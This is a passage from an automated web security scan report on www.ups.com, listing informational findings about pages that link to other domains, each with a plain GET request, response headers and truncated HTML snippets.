Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:15 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36708


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.18. http://www.ups.com/content/us/en/locations/custcenters/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/custcenters/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/locations/custcenters/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36727


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.19. http://www.ups.com/content/us/en/locations/dropboxes/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/dropboxes/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/locations/dropboxes/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36993


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.20. http://www.ups.com/content/us/en/locations/store/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/locations/store/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/locations/store/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37951


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<br>
<A href="http://theupsstore.com/promise" target="Learn More About The Pack &amp; Ship Promise">Learn More About The Pack &amp; Ship Promise</A>
...[SNIP]...
<BR><A href="http://www.theupsstore.com/products/corretsol.html">Learn More About Corporate Retail Solutions</A>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.21. http://www.ups.com/content/us/en/myups/billing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/billing/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/myups/billing/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39346


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.22. http://www.ups.com/content/us/en/myups/mgmt/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/myups/mgmt/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/myups/mgmt/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33227


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.23. http://www.ups.com/content/us/en/register/help/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/help/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/register/help/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32033


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.24. http://www.ups.com/content/us/en/register/reasons/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/register/reasons/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/register/reasons/index.html?WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:21 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35843


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.25. http://www.ups.com/content/us/en/resources/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/index.html?WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:58 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63123


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.26. http://www.ups.com/content/us/en/resources/pay/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/pay/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/pay/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:06 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44682


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.27. http://www.ups.com/content/us/en/resources/service/delivery_change.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/delivery_change.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/service/delivery_change.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.28. http://www.ups.com/content/us/en/resources/service/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/service/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/service/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43003


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.29. http://www.ups.com/content/us/en/resources/ship/fraud.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/fraud.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/fraud.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IMG src="/img/icn_arrow_blue.gif"><A href="http://www.ftc.gov" target=new>Visit the Federal Trade Commission</A>
...[SNIP]...
<IMG src="/img/icn_arrow_blue.gif"><A href="http://www.ic3.gov" target=new>Visit the Internet Crime Complaint Center</A>
...[SNIP]...
<div class="arrow-blue"><a href="http://www.adobe.com">Get Adobe Reader</a>
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.30. http://www.ups.com/content/us/en/resources/ship/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 55142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.31. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/privacy.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/privacy.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:01 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.32. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/shipping/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/shipping/index.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35473


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.33. http://www.ups.com/content/us/en/resources/ship/terms/use.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/ship/terms/use.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/ship/terms/use.html?WT.svl=Footer HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:00 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 75898


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.34. http://www.ups.com/content/us/en/resources/start/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/start/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/start/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:24:59 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42800


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.35. http://www.ups.com/content/us/en/resources/techsupport/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/techsupport/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/techsupport/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45063


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.36. http://www.ups.com/content/us/en/resources/track/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/resources/track/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /content/us/en/resources/track/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:04 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42639


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<li><a href="http://ccc01.opinionlab.com/o.asp?id=WmcejheE&t1=0&t2=0&referrer=www.ups.com" target="_blank"><img title="[+] Site Feedback" alt="[+] Site Feedback" src="/img/icn_plus_white.gif" width="9" height="9">
...[SNIP]...
<li><a href="http://www.upsjobs.com/?WT.svl=Footer">Careers</a>
...[SNIP]...

6.37. http://www.ups.com/content/us/en/shipping/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/shipping/index.html

Issue detail

The page was loaded from a URL containing a query string:

